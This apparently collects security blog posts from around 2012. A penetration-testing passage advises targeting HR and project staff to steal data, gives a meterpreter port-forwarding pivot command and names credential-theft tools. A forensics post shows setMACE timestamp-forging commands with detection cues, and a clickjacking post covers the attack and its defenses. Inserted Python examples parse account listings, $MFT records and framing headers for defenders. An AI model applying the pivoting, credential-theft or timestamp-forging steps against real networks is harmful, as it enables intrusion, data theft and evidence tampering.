    Global Group memberships     *Enterprise Admins
    The command completed successfully.

Other places to search for central repositories of critical assets are within Active Directory (will be covered in a separate entry).
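For a defender doing the same inventory at scale, here is an added example (not code from the article) that parses "net user" output to record where each account's home directory lives and whether the account sits in a privileged group. The sample output is constructed to match the listing above, and the PRIVILEGED_GROUPS set is an assumption to tailor to your domain.

```python
"""Parse ``net user <name> /domain`` output to record where an account's home
directory lives and whether it sits in a privileged group. Added example, not
part of the article; the output below is constructed in the article's layout."""
import re

# Constructed sample output (same fields as the article's listing).
NET_USER_OUTPUT = """\
User name                    TonyLee
Full Name                    Tony Lee
Comment                      Guy writing this article
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Home directory               \\\\CentralServer\\TonyLee
Last logon                   1/2/2012 7:28:17 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *Enterprise Admins
The command completed successfully.
"""

# Groups whose members warrant review (assumption: tailor this to the domain).
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins", "Schema Admins"}

FIELD = re.compile(r"^(\S.*?)(?:\s{2,}(.*))?$")  # label, 2+ spaces, optional value

def parse_net_user(text):
    """Return {label: value}; the two group-membership fields become lists."""
    fields = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("The command completed"):
            continue
        label, value = FIELD.match(line).groups()
        value = (value or "").strip()
        if label.lower().endswith("group memberships"):
            # Memberships are printed as "*Group1       *Group2"
            fields[label] = [g.strip() for g in value.split("*") if g.strip()]
        else:
            fields[label] = value
    return fields

def home_server(fields):
    """Server name from a UNC home directory (\\\\server\\share), or None if local/unset."""
    m = re.match(r"^\\\\([^\\]+)\\", fields.get("Home directory", ""))
    return m.group(1) if m else None

def privileged_groups(fields):
    """Privileged groups the account belongs to, local and global, sorted."""
    groups = fields.get("Local Group Memberships", []) + fields.get("Global Group memberships", [])
    return sorted(g for g in groups if g in PRIVILEGED_GROUPS)

def audit(text):
    """Summarise one account: who, where the home directory lives, privileged groups."""
    f = parse_net_user(text)
    return {"user": f.get("User name"), "home_server": home_server(f),
            "privileged": privileged_groups(f)}
```

Run audit() over the output for every domain account and group by home_server to see how centralized the home directories are, and filter on a non-empty privileged list to find the accounts that deserve the closest watch.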

Privileges Required to Get the Goods:

You don’t always need DA or EA. Sometimes all you need is the database service account credentials if your goods reside in a database. You can also try to target goods by targeting specific people that would have access to them. For example, when targeting PII, we can target HR, payroll, legal, or finance personnel. When we are stealing project designs, formulas, and processes, we will target project managers (good bang for the buck), designers, or scientists. When after promotional information, marketing and legal personnel are great resources.

This useful targeting information is usually found internally in the employee directory (intranet.companyname.com) or externally via the company website or LinkedIn.

Note: In order to access internal Intranet websites from outside the company, use one of the hosts obtained in Part I of the series as a pivot point and redirect web requests through that host via meterpreter’s portfwd:
    meterpreter > portfwd add -l 8080 -p 80 -r IP.AD.DRE.SS
    [*] Local TCP relay created: <-> IP.AD.DRE.SS:80

Open a browser and navigate to http://localhost:8080 and you will be able to surf the intranet website as if it were local.

Domain Admin or Enterprise Admin level access may not always be required; however, it is useful to have when propagating to other hosts within the domain. We will discuss in detail our favorite ways to get this level of access in the next article, but for now we will leave you with a few ideas.

The primary culprits of leaking this access are:
  1. Service accounts with too much privilege
  2. Admins that regularly use their EA and DA access

Best ways to steal and use this level of access are:
  1. Steal_token
  2. Incognito
  3. Windows Credential Editor
  4. Gsecdump
  5. MSF’s psexec

Details to follow in our next article in this series…

Tuesday, January 3, 2012

Windows Timestamp Tampering

By Glenn P. Edwards Jr.

From time to time someone will bring up the topic of Windows time stamp manipulation and if it’s not related to a piece of malware then it’s generally about Timestomp or touch. These discussions usually contain the same repetitive information – most notably being to check the time stamp values of the file (in NTFS everything, including directories, is considered a file) in the $MFT and see if anything stands out. This is usually done by looking at the $STANDARD_INFORMATION and $FILE_NAME attributes for each file. During the rest of the post these two values will be referred to as $SI and $FN.

In regards to the $FN attribute, Brian Carrier states that “Windows does not typically update this set of temporal values like it does with those in the $STANDARD_INFORMATION attribute, and they frequently correspond to when the file was created, moved, or renamed," (page 318).

There have been previous write-ups regarding time stamp manipulation, and Rob Lee has also created some great charts outlining rules for time stamp changes. In the Windows world the NtSetInformationFile function, which is inside of NTDLL.dll, is used to set the MACE timestamps on files within NTFS.

MACE timestamps explained:
  • M – modify
  • A – access
  • C – create
  • E – entry modified (sometimes also referred to as a ‘B’ for Born date)

Recently, there’s been some chatter again about this topic throughout the DFIR community; however, this time something different was being discussed – modification of the $FN values. It isn’t impossible if you think about it: why couldn’t they be changed? Examples of how to do it have been publicly available, but the tool setMACE got some noise because it’s able to modify the $FN values in an automated and easy way.

If you’ve looked at Rob Lee’s charts or read about the $SI and $FN in Harlan’s Book then you’re aware of the different scenarios that can affect how these values change (i.e. whether they’re copied, moved, moved to another volume etc.). setMACE uses a move ‘trick’ in order to be able to change the $FN values. Basically, if you choose to change all four values in both attributes then it will:
  1. Set the $SI values to what you choose
  2. Create a randomly named folder on the volume
  3. Move the file to that new folder (on the same volume)
  4. Set the $FN values to match the arbitrary $SI values

To date, throughout my investigations I have yet to see any indication of all (8-12) of the $SI & $FN values being tampered with… but that doesn’t mean I shouldn’t be aware that it can happen. It’s generally just the $SI that gets altered because there’s a documented Win32 API for dealing with them.

Windows timestamps can be an invaluable piece of information to an investigation but you should also be aware of other ‘features’ which may cause confusion during your analysis (i.e. Windows Tunneling).

Testing Process

The testing process outlined below was repeated with an attached NTFS formatted USB drive across the following combinations:

  • Windows XP x86 w/ SP3
    1. administrator account
    2. limited user account
  • Windows 7 x64 w/ SP1
    1. administrator account
    2. limited user account

  1. Created a file with a short filename on that USB drive:
    c:\>echo "short file" >> E:\short.txt

  2. Created a file with a long filename on that USB drive. Because of the 8.3 filename limitation, I wanted to test whether a file with a long file name would have all of its $FN attribute values modified (since there’d be more than one, as opposed to the shorter file name in step 1).

    c:\>echo "long file" >> E:\longfilename.txt

  3. Grabbed the $MFT prior to tampering.
  4. Ran setMACE against both of the files with the options to set all of the $SI and $FN timestamp values to a new value:

    c:\>setMACE.exe "E:\short.txt" -z "2000:01:01:00:00:00:789:1234" -x
    c:\>setMACE.exe "E:\longfilename.txt" -z "2000:01:01:00:00:00:789:1234" -x

    * Dates may appear different in my results because I switched them up sometimes to see what would be produced.
  5. Grabbed the $MFT after tampering.
  6. While there are a few tools out there for $MFT parsing, I chose Harlan Carvey’s mft.pl and ran it against each of the $MFTs:

    c:\>perl mft.pl $MFT.original > mft.original.txt
    c:\>perl mft.pl $MFT.tampered > mft.tampered.txt

    * When run under a limited account on a system using UAC, as expected, the prompt is displayed and requires administrative privileges in order to carry out its modifications (be aware that this can be bypassed):

I didn’t want to flood the post with the output of all of the tests but I did want to include some evidence/indication of what the $SI and $FN values will look like after such an event occurs. Below are the results from using setMACE on a Windows 7 x64 machine running as an administrator:

Original $MFT:
35 FILE Seq: 1 Link: 1 0x38 3 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Thu Dec 29 22:56:11 2011 Z
A: Thu Dec 29 22:56:11 2011 Z
C: Thu Dec 29 22:56:11 2011 Z
B: Thu Dec 29 22:56:11 2011 Z
0x0030 112 0 0x0000 0x0000
FN: short.txt Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:56:11 2011 Z
A: Thu Dec 29 22:56:11 2011 Z
C: Thu Dec 29 22:56:11 2011 Z
B: Thu Dec 29 22:56:11 2011 Z
0x0080 40 0 0x0000 0x0018

36 FILE Seq: 1 Link: 2 0x38 4 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Thu Dec 29 22:56:16 2011 Z
A: Thu Dec 29 22:56:16 2011 Z
C: Thu Dec 29 22:56:16 2011 Z
B: Thu Dec 29 22:56:16 2011 Z
0x0030 120 0 0x0000 0x0000
FN: LONGFI~1.TXT Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:56:16 2011 Z
A: Thu Dec 29 22:56:16 2011 Z
C: Thu Dec 29 22:56:16 2011 Z
B: Thu Dec 29 22:56:16 2011 Z
0x0030 128 0 0x0000 0x0000
FN: longfilename.txt Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:56:16 2011 Z
A: Thu Dec 29 22:56:16 2011 Z
C: Thu Dec 29 22:56:16 2011 Z
B: Thu Dec 29 22:56:16 2011 Z
0x0080 40 0 0x0000 0x0018

37 FILE Seq: 1 Link: 0 0x38 0 Flags:

Tampered $MFT:
35 FILE Seq: 1 Link: 1 0x38 5 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Thu Jan 1 00:00:00 1970 Z
A: Thu Jan 1 00:00:00 1970 Z
C: Thu Jan 1 00:00:00 1970 Z
B: Thu Jan 1 00:00:00 1970 Z
0x0030 112 0 0x0000 0x0000
FN: short.txt Parent Ref: 5 Parent Seq: 5
M: Thu Jan 1 00:00:00 1970 Z
A: Thu Jan 1 00:00:00 1970 Z
C: Thu Jan 1 00:00:00 1970 Z
B: Thu Jan 1 00:00:00 1970 Z
0x0080 40 0 0x0000 0x0018

36 FILE Seq: 1 Link: 2 0x38 8 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Sun Nov 25 02:24:00 2040 Z
A: Sun Nov 25 02:24:00 2040 Z
C: Sun Nov 25 02:24:00 2040 Z
B: Sun Nov 25 02:24:00 2040 Z
0x0030 120 0 0x0000 0x0000
FN: LONGFI~1.TXT Parent Ref: 5 Parent Seq: 5
M: Sun Nov 25 02:24:00 2040 Z
A: Sun Nov 25 02:24:00 2040 Z
C: Sun Nov 25 02:24:00 2040 Z
B: Sun Nov 25 02:24:00 2040 Z
0x0030 128 0 0x0000 0x0000
FN: longfilename.txt Parent Ref: 5 Parent Seq: 5
M: Sun Nov 25 02:24:00 2040 Z
A: Sun Nov 25 02:24:00 2040 Z
C: Sun Nov 25 02:24:00 2040 Z
B: Sun Nov 25 02:24:00 2040 Z
0x0080 40 0 0x0000 0x0018

37 FILE Seq: 3 Link: 1 0x38 3 Flags: 2
0x0010 96 0 0x0000 0x0000
M: Thu Dec 29 22:57:45 2011 Z
A: Thu Dec 29 22:57:45 2011 Z
C: Thu Dec 29 22:57:45 2011 Z
B: Thu Dec 29 22:57:45 2011 Z
0x0030 104 0 0x0000 0x0000
FN: 53142 Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:57:45 2011 Z
A: Thu Dec 29 22:57:45 2011 Z
C: Thu Dec 29 22:57:45 2011 Z
B: Thu Dec 29 22:57:45 2011 Z
0x0090 80 0 0x0004 0x0018

As you can see from the above snippet of both $MFTs, the original $MFT entries have their MACE timestamps from 12/29/11, while the tampered $MFT entries have their MACE timestamps set either historic or futuristic. Also of note is $MFT entry #37, which in the tampered $MFT showed a folder named “53142”. This is the randomly generated folder setMACE created in order to carry out its move trick, but it’s a good piece of forensic evidence since it wasn’t previously there and its timestamps are current.

Forensic Evidence

While it may make some in the DFIR community a bit depressed to see a working POC that the $FN values can also be changed, it shouldn’t be the end of the world. It was bound to happen, and now that there’s something known out there, its characteristics and methods should be studied and observed. This type of thing is likely going to come up in your investigation at some point, so instead of throwing in the towel, why not show how good your forensics-foo is? There are plenty of artifacts that can aid in the detection of timestamp manipulation:
  • How did it get to the system?
    • Web traffic (proxies), email, removable media
  • Do you have physical possession of the file you suspect performs the time stomping? If so, dynamic analysis will be the best resource.
  • Do you have a memory dump?
  • Was it executed on the system?
    • Prefetch, .lnk files, NTUSER.DAT’s Recent folder, A/V logs, MRU, ShellBags, {THINK!}
  • Are there any specific characteristics to the tool used?
    • Testing with setMACE showed possible indicators:
      • UAC dialog box for >= 6.0
      • Randomly named folder with digits created then deleted
        • $MFT record number of file(s) modified are close to that newly created folder
        • Time stamps of that folder created weren’t tampered with so good indication of when it occurred
  • What does the $I30 show?
  • What does the $INDX show?
  • Was the system clock altered?
  • Are both the $SI and $FN values modified? Does each of the $FN have their values changed?
  • Do the $FN values predate the $SI values? Should they?
  • What about the values in the $SI and $FN?
    • Do they seem impossible to exist? i.e. futuristic or too historic
    • Are the milli/nano seconds not set correctly? (Think granular, Timestomp & Magic Attribute usually set to the nearest second)
    • Are they blank?
    • Are they inconsistent when put into a timeline?
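To turn several of the questions above into something repeatable, here is an added example (not code from the post or from mft.pl) that parses mft.pl-style records like the ones shown earlier and applies the checks for futuristic and too-historic stamps, $SI born earlier than $FN born, and the deleted digit-named directory left behind by the move trick. The records are constructed in the layout of the listing above; the 1995 floor for plausible timestamps is an assumption.

```python
"""Indicator checks from the list above, run over mft.pl-style output. Added example,
not the post's or mft.pl's code; records are constructed in the article's layout."""
import re
from datetime import datetime

# Constructed sample: 35 backdated in $SI and $FN (setMACE style), 36 backdated in
# $SI only (Timestomp style) with a future M, 37 a deleted digit-named directory.
SAMPLE = """\
35 FILE Seq: 1 Link: 1 0x38 5 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Thu Jan 1 00:00:00 1970 Z
A: Thu Jan 1 00:00:00 1970 Z
C: Thu Jan 1 00:00:00 1970 Z
B: Thu Jan 1 00:00:00 1970 Z
0x0030 112 0 0x0000 0x0000
FN: short.txt Parent Ref: 5 Parent Seq: 5
M: Thu Jan 1 00:00:00 1970 Z
A: Thu Jan 1 00:00:00 1970 Z
C: Thu Jan 1 00:00:00 1970 Z
B: Thu Jan 1 00:00:00 1970 Z
36 FILE Seq: 1 Link: 1 0x38 3 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Sun Nov 25 02:24:00 2040 Z
A: Wed Jun 15 09:00:00 2005 Z
C: Wed Jun 15 09:00:00 2005 Z
B: Wed Jun 15 09:00:00 2005 Z
0x0030 120 0 0x0000 0x0000
FN: report.doc Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:56:16 2011 Z
A: Thu Dec 29 22:56:16 2011 Z
C: Thu Dec 29 22:56:16 2011 Z
B: Thu Dec 29 22:56:16 2011 Z
37 FILE Seq: 3 Link: 1 0x38 3 Flags: 2
0x0010 96 0 0x0000 0x0000
M: Thu Dec 29 22:57:45 2011 Z
A: Thu Dec 29 22:57:45 2011 Z
C: Thu Dec 29 22:57:45 2011 Z
B: Thu Dec 29 22:57:45 2011 Z
0x0030 104 0 0x0000 0x0000
FN: 53142 Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:57:45 2011 Z
A: Thu Dec 29 22:57:45 2011 Z
C: Thu Dec 29 22:57:45 2011 Z
B: Thu Dec 29 22:57:45 2011 Z
"""

REC = re.compile(r"^(\d+) FILE .*Flags: ?(\d*)$")
TS = re.compile(r"^([MACB]): (.+) Z$")

def parse_records(text):
    """Return [{num, flags, si: {M,A,C,B}, fn: [(name, {M,A,C,B}), ...]}, ...]."""
    records, cur, target = [], None, None
    for line in text.splitlines():
        if m := REC.match(line):
            cur = {"num": int(m.group(1)), "flags": int(m.group(2) or 0), "si": {}, "fn": []}
            records.append(cur)
        elif line.startswith("0x"):  # attribute header; only $SI and $FN carry timestamps
            target = {"0x0010": "si", "0x0030": "fn"}.get(line.split()[0])
        elif line.startswith("FN: ") and target == "fn":
            cur["fn"].append((line[4:].split(" Parent Ref:")[0], {}))
        elif target and (m := TS.match(line)):
            dest = cur["si"] if target == "si" else cur["fn"][-1][1]
            # mft.pl prints "Thu Dec 29 22:56:11 2011"; drop the weekday before parsing.
            dest[m.group(1)] = datetime.strptime(" ".join(m.group(2).split()[1:]), "%b %d %H:%M:%S %Y")
    return records

def check_record(rec, acquired, earliest=datetime(1995, 1, 1)):
    """Indicator names for one record. `acquired` is when the $MFT was grabbed;
    `earliest` is a heuristic floor (assumption) below which a stamp is implausible."""
    hits = set()
    stamps = list(rec["si"].values()) + [t for _, ts in rec["fn"] for t in ts.values()]
    if any(t > acquired for t in stamps):
        hits.add("future_timestamp")
    if any(t < earliest for t in stamps):
        hits.add("too_historic")
    # Backdating only $SI (Timestomp style) leaves $FN born later than $SI born.
    if any("B" in ts and rec["si"].get("B", ts["B"]) < ts["B"] for _, ts in rec["fn"]):
        hits.add("si_born_before_fn_born")
    # Flags bit 0x02 = directory, bit 0x01 clear = no longer in use; a deleted all-digit
    # directory name matches the folder setMACE creates and removes for its move trick.
    if rec["flags"] & 2 and not rec["flags"] & 1 and any(n.isdigit() for n, _ in rec["fn"]):
        hits.add("deleted_numeric_directory")
    return sorted(hits)
```

The sub-second granularity check from the list cannot be done on this output because mft.pl prints whole seconds; for that, parse the raw 64-bit FILETIME values instead.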

About the Author

Glenn P. Edwards Jr. is a Senior Consultant with Foundstone’s Incident Response practice where he specializes in Incident Response, Digital Forensics and Malware Analysis. Glenn holds an M.S. degree in Digital Forensics from the University of Central Florida as well as a B.S. degree in Information Security and Privacy from High Point University.

Globalized Identity, Globalized Attacks

Considerations for the Social Web

By Amit Bagree.


“I really need to comment on this Vimeo video…”
“It’s time to look for a new job, let me get on Workstir…”
“Let me point out the irony in this CNN Money article…”
“Everyone is raving about Spotify, I need to check it out…”

This is a typical ‘Netizen’ maintaining tens of user accounts on the Internet and refilling the same information every time on account creation. Every new account creation is a task, and brings added responsibility of remembering another set of usernames and passwords. For the site itself, account creation is an impediment to gaining users, on top of the technical and security challenges of maintaining an authentication system and storing sensitive user data.

In the past few years, there have been multiple efforts to solve this problem. There is a major shift occurring in the way users authenticate and interact with different properties on the Internet. The concept is straightforward: if a user has an account on another site which is willing to authenticate the user for me, why require him/her to create a new account on my l33tgadgets.com? In addition, if that site stores the users’ contacts, likes, associations etc., I can request access to them to provide a more social experience.

The idea is akin to Single sign-on (SSO) in some ways, which is very common within an Intranet environment. SSO is an access control technique in which multiple entities delegate their user authentication to an ‘Authentication Server’, thus enabling the users to keep a single identity referred to as a ‘Federated Identity’. On the Internet, various email and social media sites amongst others are offering to be ‘Authentication Providers’; Facebook, Twitter, Google and Yahoo being the most popular.

A key difference to note from the standard Intranet SSO concept is that ‘Authentication Providers’ for the Internet have to allow integration of entities that they have no control or oversight over, and no trust relationship with. In addition, the primary standards currently used by the Authentication Providers - OAuth, OpenID (likely to be updated to OpenID Connect), and ‘Facebook Connect’ - are in their evolution phase. These aspects bring unique security challenges which I’ll be discussing in a series of blog posts. Readers are encouraged to study the references for the three standards mentioned above.

UI Redressing – Write on my wall

UI Redressing, widely known as Clickjacking, is an instance of a ‘Confused Deputy’ vulnerability where the victim is tricked into performing sensitive actions (mouse clicks, keystrokes) on an authenticated site by hiding it behind another web page which is under the attacker’s control – think ‘Click here to win an iPad’ overlaid on a ‘Delete account’ button.

UI Redressing shot into the limelight with the Adobe Flash vulnerability which allowed tricking a user into enabling his webcam in the Flash plug-in settings. The exploit in Figure 1, although non-functional, helps in envisioning the attack. Note the Flash player settings captured inside an IFRAME and a ‘Click’ button overlaid on top.

Any sensitive functionality on an application such as ‘delete all emails’, ‘mark photos public’, ‘add a friend’ is a good candidate for a UI Redressing attack. Note that victim actions are not restricted to clicks alone, and as this blog post excellently describes, there are multiple other techniques such as dragging text into the victim application and capturing keystrokes via browser behavior or exploit. Clickjacking, thus, is a misnomer, and ‘UI redressing’ attack is a more appropriate term.

UI Redressing has been around for a while and with Globalized Identities it gets more potent. Take for example Facebook Connect. Many popular sites around the web now automatically connect your Facebook profile to their sites. This ‘Connect’ can take many forms ranging from simple ‘likes’ and a ‘facepile’ of your friends (who like that site) to more interesting features such as sending messages and making comments.

In pre-Facebook Connect days, if attackers needed to trick a user into performing a function on his/her Facebook page via UI Redressing, it meant attacking Facebook directly. And to Facebook’s credit, they implemented Anti-Clickjacking measures. However, now with the ubiquity of such Facebook Connect features on the web, the attacker needs to capture just one of these sites to perform the attack. These sites are likely to have much weaker, if any, Clickjacking protection. As per a Stanford study, not a single top 500 website had adequate defense against Clickjacking. Considering the fact that there are over half a million Facebook users and social engineering attacks are fairly successful, it is easy to imagine a rise in UI Redressing attacks ranging from unintentional and potentially damaging comments to a viral video for profit. The attack leaves a lot of room for the attacker’s creativity.

The naïve example below shows a news site with the Facebook ‘Comment’ plug-in, captured in an IFRAME, persuading a user to reveal sensitive information. The frame is kept partially opaque, but an attacker would of course keep the opacity at 0. Also note that you can tag Facebook users using the ‘@’ symbol.


As a general principle of Information Security, a diversity of measures should be used for protection.

Application Developers

  • Sites implementing ‘Facebook Connect’ and other third-party authentication services with powerful functionality need to do more to protect their visitors. Mozilla Firefox has support for Content Security Policy (CSP) since version 3.7 and currently it is undergoing standardization at the W3C Web Application Security Working Group. The frame-ancestors directive in the policy can be used to define which sites are approved to frame your site. Microsoft came up with a dedicated header, ‘X-FRAME-OPTIONS’, to prevent UI Redressing, taking a similar approach to define sites which are allowed to frame your site (note that CSP is more encompassing in its goal and implements features to mitigate other web application vulnerabilities such as Cross-site scripting). The X-FRAME-OPTIONS header is supported by current versions of all major browsers. In spite of the availability of such simple countermeasures, the adoption of these headers is abysmal. It is time they are put to use.
  • Another mitigation technique against UI Redressing is using frame-busting code which was an initial make-shift countermeasure. Currently the best known frame busting code can be used to protect users of older browsers. Keep in mind that numerous older frame-busting solutions can be bypassed in numerous ways.
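To verify the two headers just described in your own responses, here is an added example (not code from the post) that decides whether a given origin may frame a page, evaluating a CSP frame-ancestors directive first and falling back to X-Frame-Options, with a weak header set beside a hardened one. The header values and hostnames are constructed.

```python
"""Decide whether response headers let a page be framed by a given origin, covering
the two countermeasures named above: X-Frame-Options and CSP frame-ancestors.
Added example, not from the post; header sets and hostnames are constructed."""
from urllib.parse import urlsplit

# Constructed: a news site embedding a third-party comment plug-in, before and after.
WEAK = {"Content-Type": "text/html"}  # no framing restriction at all
HARDENED = {"Content-Type": "text/html",
            "X-Frame-Options": "SAMEORIGIN",  # fallback for browsers without CSP
            "Content-Security-Policy": "frame-ancestors 'self' https://*.news.example"}

def _source_matches(source, framer, page):
    """Match one frame-ancestors source expression against the framing origin.
    Ports are ignored for brevity; that is a simplification of the spec."""
    source = source.strip("'").lower()
    if source == "self":
        return (framer.scheme, framer.hostname) == (page.scheme, page.hostname)
    if source == "none":
        return False
    if source == "*":
        return True
    if source in ("http:", "https:"):  # scheme-source
        return framer.scheme == source[:-1]
    host = urlsplit(source if "://" in source else "//" + source).hostname or ""
    if host.startswith("*."):  # wildcard host-source
        return framer.hostname.endswith(host[1:])
    return framer.hostname == host

def may_be_framed(headers, page_url, framer_url):
    """True if a document at framer_url may embed page_url in a frame, given headers.
    A frame-ancestors directive, when present, takes precedence over X-Frame-Options."""
    lower = {k.lower(): v for k, v in headers.items()}
    page, framer = urlsplit(page_url), urlsplit(framer_url)
    for directive in lower.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return any(_source_matches(s, framer, page) for s in parts[1:])
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return (page.scheme, page.hostname, page.port) == (framer.scheme, framer.hostname, framer.port)
    if xfo.startswith("ALLOW-FROM "):  # legacy single-origin form
        allowed = urlsplit(xfo[len("ALLOW-FROM "):].strip().lower())
        return (allowed.scheme, allowed.hostname) == (framer.scheme, framer.hostname)
    return True  # neither header: any site can frame the page
```

Point it at the headers your own site returns for the page carrying the comment plug-in, using an untrusted origin as framer_url; a True result is the condition the attack above relies on.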

Authentication Providers

  • Authentication providers such as Facebook ought to provide an opt-in choice to their users. This would require architectural change in the Facebook Connect implementation but to acknowledge the risk and provide a choice to the user would go a long way in keeping them happy. Currently there is no way for a user to avoid authenticating to these sites with their Facebook identity by default when they are logged in to Facebook. The integration of Facebook identity to sites around the web without any user interaction exposes sensitive functionalities such as messaging and commenting to attacks.

End Users

  • Unfortunately the users at present are largely at the mercy of the application developers and Facebook. As a workaround, ad-blocking utilities on Firefox and Chrome such as AdBlock Plus can be used to block requests to Facebook domains from third-party applications.
  • The Firefox plug-in NoScript provides UI Redressing protection via its ‘ClearClick’ module. It performs a clever check of comparing screenshots of the actual object the user intends to click and of the page the user sees. A difference in the images raises a UI Redressing alert. The module provides protection even if the user chooses ‘Allow scripts globally’.
  • It’s a good practice to logout from Facebook after you are done but it’s a cumbersome solution for many and doesn’t prevent the attack while they are logged in.
  • End Users need to develop healthy skepticism. Do not enter any sensitive data and/or click on unknown or suspicious sites no matter how enticing that game might be.

Big thanks to Patrick Bogen for the technical review!

Monday, January 2, 2012

Tiny Car Super Ramp!

One of the assistants here just so happened to have a little red McAfee branded Volkswagen beetle.. so this ArtsNCrafts session is about building a super ramp for it made out of FedEx boxes!